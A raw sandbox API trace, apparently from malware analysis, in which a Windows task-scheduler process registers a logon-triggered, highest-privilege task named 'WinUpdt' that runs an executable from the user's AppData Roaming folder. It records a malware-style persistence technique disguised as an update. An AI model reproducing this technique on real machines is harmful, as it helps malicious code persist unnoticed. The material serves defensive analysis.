StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0067.786] StrChrW (lpStart=" \x09", wMatch=0x27) returned 0x0 [0067.786] GetLastError () returned 0x0 [0067.786] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.786] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.786] SetLastError (dwErrCode=0x0) [0067.786] GetProcessHeap () returned 0x660000 [0067.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6753d8 [0067.786] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.786] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0067.786] lstrlenW (lpString="LIMITED") returned 7 [0067.786] GetProcessHeap () returned 0x660000 [0067.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674ca8 [0067.786] GetThreadLocale () returned 0x409 [0067.786] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0067.786] GetProcessHeap () returned 0x660000 [0067.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6753b8 [0067.787] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.787] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0067.787] lstrlenW (lpString="HIGHEST") returned 7 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674d38 [0067.787] GetThreadLocale () returned 0x409 [0067.787] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675398 [0067.787] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.787] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0067.787] lstrlenW (lpString="MINUTE") returned 6 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xe) returned 0x674d50 [0067.787] GetThreadLocale () returned 0x409 [0067.787] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675378 [0067.787] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.787] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0067.787] lstrlenW (lpString="HOURLY") returned 6 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xe) returned 0x674d68 [0067.787] GetThreadLocale () returned 0x409 [0067.787] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675358 [0067.787] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.787] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0067.787] lstrlenW (lpString="DAILY") returned 5 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xc) returned 0x674d80 [0067.787] GetThreadLocale () returned 0x409 [0067.787] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0067.787] GetProcessHeap () returned 0x660000 [0067.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675338 [0067.787] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.788] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0067.788] lstrlenW (lpString="WEEKLY") returned 6 [0067.788] GetProcessHeap () returned 0x660000 [0067.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xe) returned 0x674d98 [0067.788] GetThreadLocale () returned 0x409 [0067.788] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0067.788] GetProcessHeap () returned 0x660000 [0067.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6752f8 [0067.788] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.788] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0067.788] lstrlenW (lpString="MONTHLY") returned 7 [0067.788] GetProcessHeap () returned 0x660000 [0067.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674db0 [0067.788] GetThreadLocale () returned 0x409 [0067.788] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0067.788] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.788] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0067.788] lstrlenW (lpString="ONCE") returned 4 [0067.788] GetProcessHeap () returned 0x660000 [0067.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xa) returned 0x674dc8 [0067.788] GetThreadLocale () returned 0x409 [0067.788] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0067.788] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.788] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0067.788] lstrlenW (lpString="ONSTART") returned 7 [0067.788] GetThreadLocale () returned 0x409 [0067.788] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 1 [0067.788] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.788] LoadStringW (in: hInstance=0x0, uID=0x1b5, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="ONLOGON") returned 0x7 [0067.788] lstrlenW (lpString="ONLOGON") returned 7 [0067.788] GetThreadLocale () returned 0x409 [0067.788] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONLOGON", cchCount2=-1) returned 2 [0067.788] SetLastError (dwErrCode=0x0) [0067.789] GetProcessHeap () returned 0x660000 [0067.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x1fc) returned 0x6769f0 [0067.789] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.789] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0067.789] lstrlenW (lpString="First") returned 5 [0067.789] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.789] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0067.789] lstrlenW (lpString="Second") returned 6 [0067.789] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.789] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0067.789] lstrlenW (lpString="Third") returned 5 [0067.789] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.789] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0067.789] lstrlenW (lpString="Fourth") returned 6 [0067.789] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.789] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0067.789] lstrlenW (lpString="Last") returned 4 [0067.833] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.833] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0067.833] lstrlenW (lpString="First") returned 5 [0067.833] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.833] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0067.833] lstrlenW (lpString="Second") returned 6 [0067.833] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.833] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0067.833] lstrlenW (lpString="Third") returned 5 [0067.833] GetProcessHeap () returned 0x660000 [0067.833] GetProcessHeap () returned 0x660000 [0067.833] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674dc8) returned 1 [0067.833] GetProcessHeap () returned 0x660000 [0067.833] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674dc8) returned 0xa [0067.833] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674dc8 | out: hHeap=0x660000) returned 1 [0067.833] GetProcessHeap () returned 0x660000 [0067.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xc) returned 0x674dc8 [0067.833] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.833] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0067.833] lstrlenW (lpString="Fourth") returned 6 [0067.833] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.833] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0067.833] lstrlenW (lpString="Last") returned 4 [0067.834] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x29c7e8, cchData=128 | out: lpLCData="0") returned 2 [0067.834] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.834] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0067.834] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674ca8) returned 1 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674ca8) returned 0x10 [0067.834] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ca8 | out: hHeap=0x660000) returned 1 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x16) returned 0x675458 [0067.834] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x29c7f0, cchData=128 | out: lpLCData="0") returned 2 [0067.834] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.834] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0067.834] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674d38) returned 1 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674d38) returned 0x10 [0067.834] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d38 | out: hHeap=0x660000) returned 1 [0067.834] GetProcessHeap () returned 0x660000 [0067.834] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x16) returned 0x675478 [0067.834] GetLocalTime (in: lpSystemTime=0x29c9a0 | out: lpSystemTime=0x29c9a0*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x2, wDay=0x11, wHour=0x13, wMinute=0x1c, wSecond=0x1c, wMilliseconds=0x1bb)) [0067.835] GetLocalTime (in: lpSystemTime=0x29cdbc | out: lpSystemTime=0x29cdbc*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x2, wDay=0x11, wHour=0x13, wMinute=0x1c, wSecond=0x1c, wMilliseconds=0x1bb)) [0067.835] lstrlenW (lpString="") returned 0 [0067.835] lstrlenW (lpString="") returned 0 [0067.835] lstrlenW (lpString="") returned 0 [0067.835] lstrlenW (lpString="") returned 0 [0067.835] lstrlenW (lpString="") returned 0 [0067.835] lstrlenW (lpString="") returned 0 [0067.835] lstrlenW (lpString="") returned 0 [0067.835] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0067.923] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0068.078] CoCreateInstance (in: rclsid=0x51230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x5120fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x29cd74 | out: ppv=0x29cd74*=0x933e20) returned 0x0 [0068.294] TaskScheduler:ITaskService:Connect (This=0x933e20, serverName=0x29cce4*(varType=0x8, wReserved1=0xcc8f, wReserved2=0xcd78, wReserved3=0x29, varVal1=0x0, varVal2=0x29cd5c), user=0x29ccf4*(varType=0x0, wReserved1=0x76c1, wReserved2=0x141c, wReserved3=0x69c5, varVal1=0x29e850, varVal2=0x29dc60), domain=0x29cd04*(varType=0x0, wReserved1=0x6b58, wReserved2=0xdc28, wReserved3=0x29, varVal1=0x51994e, varVal2=0x29f24c), password=0x29cd14*(varType=0x0, wReserved1=0x77ca, wReserved2=0x3c, wReserved3=0x0, varVal1=0xcc8f8800, varVal2=0xffffffa3)) returned 0x0 [0068.435] TaskScheduler:IUnknown:AddRef (This=0x933e20) returned 0x2 [0068.435] TaskScheduler:ITaskService:GetFolder (in: This=0x933e20, Path=0x0, ppFolder=0x29ce18 | out: ppFolder=0x29ce18*=0x933e88) returned 0x0 [0068.440] TaskScheduler:ITaskService:NewTask (in: This=0x933e20, flags=0x0, ppDefinition=0x29ce28 | out: ppDefinition=0x29ce28*=0x933ec8) returned 0x0 [0068.444] ITaskDefinition:get_Actions (in: This=0x933ec8, ppActions=0x29cd74 | out: ppActions=0x29cd74*=0x933f40) returned 0x0 [0068.444] IActionCollection:Create (in: This=0x933f40, Type=0, ppAction=0x29cd8c | out: ppAction=0x29cd8c*=0x9328d8) returned 0x0 [0068.445] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0068.445] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0068.445] lstrlenW (lpString=" ") returned 1 [0068.445] StrChrW (lpStart=" ", wMatch=0x27) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x27) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0068.445] StrChrW (lpStart=" ", wMatch=0x47) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x6a) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0068.446] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x7a) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x67) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x57) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0068.446] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0068.447] StrChrW (lpStart=" ", wMatch=0x64) returned 0x0 [0068.447] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0068.447] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0068.447] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0068.447] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0068.447] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0068.447] StrChrW (lpStart=" ", wMatch=0x27) returned 0x0 [0068.447] IUnknown:Release (This=0x9328d8) returned 0x1 [0068.447] IUnknown:Release (This=0x933f40) returned 0x1 [0068.447] ITaskDefinition:get_Triggers (in: This=0x933ec8, ppTriggers=0x29c960 | out: ppTriggers=0x29c960*=0x933f88) returned 0x0 [0068.447] ITriggerCollection:Create (in: This=0x933f88, Type=9, ppTrigger=0x29c96c | out: ppTrigger=0x29c96c*=0x932918) returned 0x0 [0068.450] IUnknown:QueryInterface (in: This=0x932918, riid=0x511528*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x29c958 | out: ppvObject=0x29c958*=0x932918) returned 0x0 [0068.450] IUnknown:Release (This=0x932918) returned 0x2 [0068.450] _vsnwprintf (in: _Buffer=0x29c8d0, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0x29c8b8 | out: _Buffer="2020-03-17T19:28:00") returned 19 [0068.450] ITrigger:put_StartBoundary (This=0x932918, StartBoundary="2020-03-17T19:28:00") returned 0x0 [0068.450] lstrlenW (lpString="") returned 0 [0068.450] lstrlenW (lpString="") returned 0 [0068.450] lstrlenW (lpString="") returned 0 [0068.450] lstrlenW (lpString="") returned 0 [0068.450] IUnknown:Release (This=0x932918) returned 0x1 [0068.450] IUnknown:Release (This=0x933f88) returned 0x1 [0068.450] ITaskDefinition:get_Settings (in: This=0x933ec8, ppSettings=0x29cd7c | out: ppSettings=0x29cd7c*=0x932798) returned 0x0 [0068.450] lstrlenW (lpString="") returned 0 [0068.450] IUnknown:Release (This=0x932798) returned 0x1 [0068.450] GetLocalTime (in: lpSystemTime=0x29cc6c | out: lpSystemTime=0x29cc6c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x2, wDay=0x11, wHour=0x13, wMinute=0x1c, wSecond=0x1c, wMilliseconds=0x39e)) [0068.450] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0068.451] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0068.451] GetUserNameW (in: lpBuffer=0x29cc80, pcbBuffer=0x29cc68 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29cc68) returned 1 [0068.451] ITaskDefinition:get_RegistrationInfo (in: This=0x933ec8, ppRegistrationInfo=0x29cc7c | out: ppRegistrationInfo=0x29cc7c*=0x932728) returned 0x0 [0068.451] IRegistrationInfo:put_Author (This=0x932728, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0068.451] _vsnwprintf (in: _Buffer=0x29cc80, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0x29cc40 | out: _Buffer="2020-03-17T19:28:28") returned 19 [0068.451] IRegistrationInfo:put_Date (This=0x932728, Date="2020-03-17T19:28:28") returned 0x0 [0068.451] IUnknown:Release (This=0x932728) returned 0x1 [0068.451] malloc (_Size=0xc) returned 0x9329a0 [0068.451] free (_Block=0x9329a0) [0068.451] lstrlenW (lpString="") returned 0 [0068.451] ITaskDefinition:get_Principal (in: This=0x933ec8, ppPrincipal=0x29ce20 | out: ppPrincipal=0x29ce20*=0x932878) returned 0x0 [0068.452] IPrincipal:put_RunLevel (This=0x932878, RunLevel=1) returned 0x0 [0068.452] IUnknown:Release (This=0x932878) returned 0x1 [0068.452] malloc (_Size=0xc) returned 0x9329a0 [0068.452] ITaskFolder:RegisterTaskDefinition (in: This=0x933e88, Path="'WinUpdt'", pDefinition=0x933ec8, flags=6, UserId=0x29cd64*(varType=0x0, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1=0x325245, varVal2=0x1), password=0x29cd74*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0x29cd88*(varType=0x0, wReserved1=0x0, wReserved2=0xca10, wReserved3=0x29, varVal1=0x0, varVal2=0x0), ppTask=0x29ce14 | out: ppTask=0x29ce14*=0x933fe8) returned 0x0 [0069.403] free (_Block=0x9329a0) [0069.403] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0069.403] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0069.403] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0069.403] GetProcessHeap () returned 0x660000 [0069.403] GetProcessHeap () returned 0x660000 [0069.403] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674d50) returned 1 [0069.403] GetProcessHeap () returned 0x660000 [0069.403] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674d50) returned 0xe [0069.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d50 | out: hHeap=0x660000) returned 1 [0069.403] GetProcessHeap () returned 0x660000 [0069.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x82) returned 0x6848d0 [0069.403] _vsnwprintf (in: _Buffer=0x29d22c, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x29cd98 | out: _Buffer="SUCCESS: The scheduled task \"'WinUpdt'\" has successfully been created.\n") returned 71 [0069.403] _fileno (_File=0x77032920) returned 1 [0069.403] _errno () returned 0x9307d8 [0069.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.403] _errno () returned 0x9307d8 [0069.403] GetFileType (hFile=0x7) returned 0x2 [0069.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x29cd5c | out: lpMode=0x29cd5c) returned 1 [0069.404] __iob_func () returned 0x77032900 [0069.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.404] lstrlenW (lpString="SUCCESS: The scheduled task \"'WinUpdt'\" has successfully been created.\n") returned 71 [0069.405] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x29d22c*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x29cd84, lpReserved=0x0 | out: lpBuffer=0x29d22c*, lpNumberOfCharsWritten=0x29cd84*=0x47) returned 1 [0069.406] IUnknown:Release (This=0x933fe8) returned 0x0 [0069.406] TaskScheduler:IUnknown:Release (This=0x933ec8) returned 0x0 [0069.406] TaskScheduler:IUnknown:Release (This=0x933e88) returned 0x0 [0069.406] TaskScheduler:IUnknown:Release (This=0x933e20) returned 0x1 [0069.407] lstrlenW (lpString="") returned 0 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] HeapValidate 